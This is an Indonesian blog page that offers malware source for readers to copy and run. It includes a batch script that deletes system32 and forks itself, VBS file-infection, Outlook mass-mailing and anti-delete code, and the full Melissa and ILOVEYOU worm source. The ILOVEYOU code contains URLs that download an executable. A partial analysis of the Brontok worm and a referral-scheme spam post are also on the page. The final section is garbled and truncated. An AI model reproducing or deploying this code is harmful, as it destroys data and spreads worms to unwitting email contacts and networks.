virus asal

1.buka notepad.. kyk biasa..
2.copy script di bawah ne,,
Code:

Virus terdeteksi // Title buat window
xxx // sub skrip xxx
msg * mencoba mendelete viruz // pesan
erase "C:\WINDOWS\system32" // menghapus system32
start xxxx.bat // menjalankan file xxxx.bat yg disimpan pada folder yang sama
msg * percobaan gagal,mencoba kembali // pesan
goto xxxx // eksekusi xxxx.bat

3.save dengan nama xxx.bat(catatan:jadikan all file)
4.buka notepad lagi
5.kopikan kode yang dibawah ini.
Code:

Viruz // mengubah window title
msg * Wah2 komputer anda kena viruz// pesan di message box
del // Delete files /// "del c:" mengapus file yg di c:
erase // sama kyk del
start xxxx.bat // memulai xxxx.bat
xxx // sub skrip
goto // ke subskrip

6.save dengan nama xxxx.bat(catatan:jadikan all file,,simpen di folder yg sama dengan file
yang pertama)
7.klo mau jalanin klik aja yg xxxx.bat(ini akan menghabiskan resource komputer kamu,sebaiknya
siapkan tool seperti task kill).
8.klo mw jalanin otomatis pas startup caranya sama dengan virus vbs
hahaha!
med coba deh...!

Read Users' Comments (0)

Dapat kan HP,Ipod,PS3 DLL gratis ko,, sumpahhhhhhhh!!!!!!!!!!!

Mau HP gratis??
HP, HDTV??
Yang gamers ada PS 3 atau X-Box??
Banyak deh pokoknya.. gue aja sampe bingung loh milih yang mana

Bener2 nggak bayar sama sekali (Free)!!!

Hari gini gratis!?? ga percaya??? hahahahaha
sama.. tadinya gue juga ga percaya, tp awalnya mang cuman iseng.

Mau coba?? gini Caranya:

1. Masuk ke sini : (klik aja langsung)
http://www.xpango.com?ref=92036201

2. pilih gratisan apa yang loe mau (ga cuman HP, ada iPod, ada game machine kaya OX, Nintendo DS, PSP, dll) pokoknya keren deh...

3. klick free gaming console,...Trus sign up (gratis kok) <<>> bagian bawah!
Isi alamat selengkap-lengkapnya (takut nyasar) he..he..he.. Pas pengisian kotak terakhir,, ada REFFERAL ID

5. isi refferal id dgn : 92036201. INGAT.. 92036201 (Remember)

Nanti akan ada email konfirmasi ke email loe yg jg ngasih refferal number buat loe.

setelah itu kirim pesan ini ke temen2loe dan ganti id refferal dengan id-loe

Makin byk temen yg loe ajak gabung, makin byk point yg loe dpt dan ketika loe dapetin jumlah point yg sesuai dgn hadiah / hp yg loe minta, bakalan dikirim tuh Hp/iPod/Gadget ke alamat loe..

sbg contoh, iPod 80GB nilainya 16 point, jd kalo loe bisa ajak 16 temen buat register aja, dpt deh .. asik kan? Coba deh, ga ada ruginya koq..
Kan, ga bayar sama sekali...
gampang kok.....
gabung ya
mumpung di indonesia masih sedkit yg gabung,
thank's b 4.
:: Xpango - Free Gaming Consoles, Free Mobile Phones, Free MP3 Players and Free HDTV's! ::
Sumber: www.xpango.com
:: Xpango - Free Gaming Consoles, Free Mobile Phones, Free MP3 Players and Free HDTV's! ::
Sumber: www.xpango.com

Read Users' Comments (0)

Virus Brontok

Yarohim.... buat elu nih..

Source Code Virus Brontok
Minggu 4 Oct 09 - by : jangkrikvirusdago
Dalam belakangan waktu ini mungkin anda pernah mendengar nama virus Brontok?......ya betul virus yang menduplikatkan dirinya dan menyesuaikan nama virus barunya berdasarkan folder atau file pada window epxlorer yang aktif. Ciri khas dari virus ini adalah menggunakan Icon folder, sehingga dapat mengecoh seseorang yang melihatnya.

Mengapa membahas virus ini?,...hmm...m....sebetulnya saya tidak terlalu tertarik membahas ini, tau nggak apa yang menyebabkan saya tertarik membahasnya?...pasti nggak tau kan .....ini disebabkan beberapa hari lalu banyak kehebohan mengenai virus brontok dan sempat menginfeksi beberapa komputer teman2ku .

Ok untuk mempersingkat waktu kita langsung aja

Setelah dilihat struktur file dari virus tersebut ternyata pembuatan virusnya menggunakan visual basic 6.0 ops....ternyata made in vb coy....nah ini yang membuat tambah menarik.

Virus ini terdiri dari 1 form da 1 Module, dengan nama

Form -> BrontokForm
Module -> API

Dengan detail berikut:

Begin VB.Form BrontokForm
Caption = \"Brontok.A\"
ForeColor = &H8000000F&
ScaleMode = 1
BeginProperty Font
Name = \"\"
Size = 195323.4944
Charset = 29
Weight = 774
EndProperty

Begin VB.Timer TmrBrontok
Enabled = 0 \'False
Interval = 2000
Left = 2160
Top = 0
Width = 57352
Height = 1
End
End


Dengan nama Project: Brontok.vbp, yang disimpan pada directory:
F:\\VPROJECT\\REHAB\\Re-1\\BRONTOK.A

Jelas sekali bahwa virus ini dibuat oleh sorang program lokal, yang mempunyai skill Menengah Keatas.

Ada beberapa procedure & function yang digunakan dengan nama:

Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
TmrBrontok_Timer()
Subr_004()
CekKoneksiInternet()
ManipulasiExec()
Subr_007()
KeluarDong()
BronReg()
CopyAppData()
DownloadVir()
StartDong()
StartUp()
DecTeks()
MutMutex()
MutCr()
DownloadFile()
CekUpdate()
InfekNetwork()
Judul()
CekRemDisk()
BikinFile()
GetEmailFile()
CekValidMail()
GetTeks()
CekKar()
ListMail()
GetTargetMBhs()
GavMailer()
BrontokMail()
Subr_031()
DataEmail()
DownMIME()
FindFilesAPI()
ListFileGav()
InfekFile()
SmallAttack()
MinggirLoe()
GetHostByNameAlias()
StripNulls()
BikinKredit()

Dan beberapa fungsi Api yang digunakan anatara lain:

Fungsi Baca Tulis Ke Register:
Declare Function RegOpenKeyExA Lib \"advapi32.dll\" ()
Declare Function RegSetValueExA Lib \"advapi32.dll\" ()
Declare Function RegCloseKey Lib \"advapi32.dll\" ()
Declare Function RegCreateKeyExA Lib \"advapi32.dll\" ()

Declare Function Sleep Lib \"kernel32\" ()

Mendapatkan Spesial Folder:
Declare Function SHGetPathFromIDList Lib \"shell32.dll\" ()
Declare Function SHGetSpecialFolderLocation Lib \"shell32.dll\" ()

Membaca Isi Halaman Situs:
Declare Function InternetOpenA Lib \"wininet.dll\" ()
Declare Function InternetOpenUrlA Lib \"wininet.dll\" ()
Declare Function InternetReadFile Lib \"wininet.dll\" ()
Declare Function InternetCloseHandle Lib \"wininet.dll\" ()

Mendapatkan Caption Dari Sebuah Window:
Declare Function GetWindowTextA Lib \"user32\" ()
Declare Function GetWindowTextLengthA Lib \"user32\" ()

Dapatkan HWND Window aktif:
Declare Function GetForegroundWindow Lib \"user32\" ()

Shutdown, Reboot, LogOff Windows:
Declare Function ExitWindowsEx Lib \"user32\" ()
Declare Function GetCurrentProcess Lib \"kernel32\" ()
Declare Function OpenProcessToken Lib \"advapi32\" ()
Declare Function LookupPrivilegeValueA Lib \"advapi32\" ()
Declare Function AdjustTokenPrivileges Lib \"advapi32\" ()

Mendapatkan Jenis Media yang ada spt Removable Disk, CD-Rom dll:
Declare Function GetDriveTypeA Lib \"kernel32\" ()

Declare Function ShellExecuteA Lib \"shell32.dll\" ()
Declare Function RtlMoveMemory Lib \"kernel32\" ()

Winsock API:
Declare Function closesocket Lib \"wsock32.dll\" ()
Declare Function connect Lib \"wsock32.dll\" ()
Declare Function htons Lib \"wsock32.dll\" ()
Declare Function inet_addr Lib \"wsock32.dll\" ()
Declare Function recv Lib \"wsock32.dll\" ()
Declare Function send Lib \"wsock32.dll\" ()
Declare Function socket Lib \"wsock32.dll\" ()
Declare Function gethostbyname Lib \"wsock32.dll\" ()
Declare Function WSAStartup Lib \"wsock32.dll\" ()
Declare Function WSACleanup Lib \"wsock32.dll\" ()
Declare Function WSAAsyncSelect Lib \"wsock32.dll\" ()

Fungsi yang berhubungan dengan file:
Declare Function FindFirstFileA Lib \"kernel32\" ()
Declare Function FindNextFileA Lib \"kernel32\" ()
Declare Function GetFileAttributesA Lib \"kernel32\" ()
Declare Function FindClose Lib \"kernel32\" ()
dll...

Terlihat jelas pada fungsi-fungsi api yang digunakan bahwa penularan virus ini brontok menggunakan beberapa cara. seperti pengiriman lewat email, pencarian nama komputer yang terhubung kejaringan dengan menyalin dirinya pada folder yang di sharing dan menyalin dirinya pada window explorer yang aktif. kalo gak salah si pembuat virus mempunyai SMTP sendiri (wah ati-ati mas ntar ketangkep)

Jika dilihat kembali pada strukturnya ada beberapa kata yang di encrypt, kemungkinan berupa exploit code atau apalah namanya. hanya allah dan pembuat virus yang tau.

Virus ini mempunyai fungsi ExitWindowsEx yang diimport dari file user32.dll, fungsi ini biasanya digunakan untuk mematikan windows.
kayaknya sipembuat virus membuat triger yang berisi perintah mematikan/merestart komputer.

Selain itu dalam struktur filenya terdapat kata-kata seperti ini:
FOLDER.HTT
RORO
.HTT
.DOC
.CSV
.EML
.CFM
.PHP
.WAB
.EML
.TXT
.HTML
.HTM
MY DATA SOURCES
MY EBOOKS
MY MUSIC
MY SHAPES
MY VIDEOS
MY DOCUMENT

Dan ada beberapa alamat situs yang diserang, apa DDOS ya...hik..hik..tau deh. Selain itu pembuat virus mencantumkan nama: --JowoBot#VM Community --

Selanjutnya coba lihat tiga fungsi api berikut:

Declare Function GetWindowTextA Lib \"user32\" ()
Declare Function GetWindowTextLengthA Lib \"user32\" ()
Declare Function GetForegroundWindow Lib \"user32\" ()

Sepertinya pembuat virus memanfaatkan windowexplorer untuk memperbanyak filenya ke folder yang lain. Dengan cara membaca Caption yang terdapat pada windows aktif yang berisi nama directory/path. Dengan menggunakan 2 fungsi diatas (GetWindowTextA & GetWindowTextLengthA), Sedangkan fungsi GetForegroundWindow digunakan untuk mendapatkan Handle Window (HWND) yang sedang aktif.

Jadi kesimpulannya virus ini tidak dapat menyalin dirinya kalo Caption pada windowExplorer bukan berupa Directory/Path. Sehinga si pembuat virus menonaktifkan setting pada Folder Options.

Kemudian yang lebih unik lagi virus ini membaca isi halaman situs yang terbuka pada sebuah InternetExplorer dengan menggunakan fungsi:

Declare Function InternetOpenA Lib \"wininet.dll\" ()
Declare Function InternetOpenUrlA Lib \"wininet.dll\" ()
Declare Function InternetReadFile Lib \"wininet.dll\" ()
Declare Function InternetCloseHandle Lib \"wininet.dll\" ()

Kalo saya tebak, sepertinya pembuat virus mencari alamat email pada halaman situs yang terbuka dan mengirimkan virus nya berdasarkan alamat email yang ditemukan pada halaman tersebut dengan kata kunci seperti mailto: ataupun @xxxx.com dll...

....Untuk membersihkannya silahkan baca selengkapnya di situs AntiVirus yang lain...he..he...maaf saya hanya membahas yang ini saja.

Tapi kalo pengen menonaktifkan virus ini secara cepat, coba masuk safemode kemudian rename file MSVBVM60.dll menjadi MSVBVM60.dl_
karena virus ini membutuhkan runtime vb. Nah kalo udah gak aktif baru kita bisa hapus beberapa registry entry dan file-file virus brontoknya.

Sayang sekali virus ini tidak menggunakan program compressor, sehingga memudahkan orang untuk mengenalinya.

Semoga bermanfaat.....


source :
- my friend: \"Anti Hacker\"
- vbbego.com
- http://www.familycode.phpbbweb.com

Read Users' Comments (0)

Virus VBS

Infeksi File Antar Visual Basic Script (.VBS)

Code:

On Error Resume Next
Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Angel1()
Sub Angel1()
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
For Each SalinMawarPutih In a.Drives
If SalinMawarPutih.DriveType = 2 _
Or SalinMawarPutih.DriveType = 3 Then
Angel3 (SalinMawarPutih.Path & "\")
End If
Next
End Sub
Sub Angel2(FileTarget)
On Error Resume Next
Set otf = a.GetFile(WScript.ScriptFullName)
ra = otf.ReadAll
otf.Close
Set a = CreateObject("Scripting.FileSystemObject")
Set f = a.GetFolder(FileTarget)
For Each n In f.Files
FileExt = LCase(a.GetExtensionName(n.Path))
If FileExt = "vbs" Or FileExt = "vbe" Then
Set openvbs = a.OpenTextFile(n.Path, 1)
vbsra = openvbs.ReadAll
openvbs.Close
If InStr(1, vbsra, "Tips And Trik by ") = False Then
Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Set JC = MawarPutih.OpenTextFile(WScript.ScriptFullName, 1)
RantingMawarPutih = JC.ReadAll
JC.Close
Set MawarMerah = MawarPutih.OpenTextFile(n.Path, 8, True)
MawarMerah.WriteLine vbCrLf & "' Hack .VBS by " & vbCrLf & "Tz = " & Chr(34) & Chr(34)
For i = 1 To Len(RantingMawarPutih)
Tz = Mid(RantingMawarPutih, i, 1)
Tz = Hex(Asc(Tz))
If Len(Tz) = 1 Then
Tz = "0" & Tz
End If
Gz = Gz + Tz
If Len(Gz) = 110 Then
MawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)
Gz = ""
End If
If Len(RantingMawarPutih) - i = 0 Then
MawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)
Gz = ""
End If
Next
MawarMerah.WriteLine "Set MawarPutih = CreateObject(""Scripting.FileSystemObject"")"
MawarMerah.WriteLine "WriteAppend.Write CM(Tz)"
MawarMerah.WriteLine "WriteAppend.Close"
MawarMerah.WriteLine "Function CM(CN)"
MawarMerah.WriteLine "For GC = 1 To Len(CN) Step 2"
MawarMerah.WriteLine "CM = CM & Chr(""&h"" & Mid(CN, GC, 2))"
MawarMerah.WriteLine "Next"
MawarMerah.WriteLine "End Function"
MawarMerah.Close
End If
End If
Next
End Sub
Sub Angel3(FileTarget)
On Error Resume Next
Set a = CreateObject("Scripting.FileSystemObject")
Set f = a.GetFolder(FileTarget)
For Each n In f.SubFolders
Angel2 (n.Path)
Angel3 (n.Path)
Next
End Sub



penyebaran Melalui E-mail Via Outlook

Code:

On Error Resume Next

Set MawarPutih = CreateObject("Scripting.FileSystemObject")
Set MawarMerah = MawarPutih.GetFile(WScript.ScriptFullName)
MawarMerah.Copy (MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
Set Attachments = MawarPutih.GetFile(MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
Attachments.Attributes = 0
Set RantingMawar = CreateObject("Outlook.Application")
If Not RantingMawar = "" Then
For Each DuriMawar In RantingMawar.GetNameSpace("MAPI").AddressLists
For DaunMawar = 1 To DuriMawar.AddressEntries.Count
Set BagianEmail = RantingMawar.CreateItem(0)
BagianEmail.Recipients.Add (DuriMawar.AddressEntries(DaunMawar))
BagianEmail.Subject = "Judul Pesan"
BagianEmail.Body = "Isi Pesan"
BagianEmail.Attachments.Add (MawarPutih.GetSpecialFolder(0) & "\File Virus.txt.vbs")
BagianEmail.DeleteAfterSubmit = True
BagianEmail.Send
Next
Next
End If



Anti Delete

Code:

On Error Resume Next

Set MawarPutih= Createobject("scripting.filesystemobject")
Set MawarMerah= MawarPutih.opentextfile(wscript.scriptfullname, 1)
BatangMawar= MawarMerah.readall
MawarMerah.Close
Do
If Not (MawarPutih.fileexists(wscript.scriptfullname)) Then
Set DuriMawar= MawarPutih.createtextfile(wscript.scriptfullname, True)
DuriMawar.writeBatangMawar
DuriMawar.Close
End If
Loop


semua code diatas.. bisa kalian jadiin 1.. tinggal kreasinya aja...
thx_to: jangkrik virus dago

Read Users' Comments (0)

Virus Mellisa

copy paste code virus nya


Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

Read Users' Comments (0)

Virus I Love U

Copy paste code virus ni!!!!!




rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML<?-?TITLE><META <br />NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ <br />"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? <br />@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ <br />"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is <br />good...@-@>"&vbcrlf& _ <br />"<?-?HEAD><BODY <br />ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM# <br />-#,#-#main#-#)@-@ "&vbcrlf& _ <br />"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM# <br />-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _ <br />"<center><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read <br />this HTML file<br />- Please press #-#YES#-# button to Enable <br />ActiveX<?-?p>"&vbcrlf& _ <br />"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ <br />BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> <br />"&vbcrlf& _ <br />"<?-?BODY><?-?HTML>"&vbcrlf& _ <br />"<script language="@-@JScript@-@">"&vbcrlf& _ <br />"<!--?-??-?"&vbcrlf& _ <br />"if (window.screen){var wi=screen.availWidth;var <br />hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ <br />"?-??-?-->"&vbcrlf& _ <br />"<?-?SCRIPT>"&vbcrlf& _ <br />"<script language="@-@VBScript@-@">"&vbcrlf& _ <br />"<!--"&vbcrlf& _ <br />"on error resume next"&vbcrlf& _ <br />"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ <br />"aw=1"&vbcrlf& _ <br />"code=" <br />dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _ <br />"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ <br />"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _ <br />"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ <br />"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ <br />"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ <br />"wri.write code4"&vbcrlf& _ <br />"wri.close"&vbcrlf& _ <br />"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ <br />"if (err.number=424) then"&vbcrlf& _ <br />"aw=0"&vbcrlf& _ <br />"end if"&vbcrlf& _ <br />"if (aw=1) then"&vbcrlf& _ <br />"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ <br />"window.close"&vbcrlf& _ <br />"end if"&vbcrlf& _ <br />"end if"&vbcrlf& _ <br />"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _ <br />"regedit.RegWrite <br />@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru <br />n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ <br />"?-??-?-->"&vbcrlf& _ <br />"<?-?SCRIPT>" <br />dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") <br />dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") <br 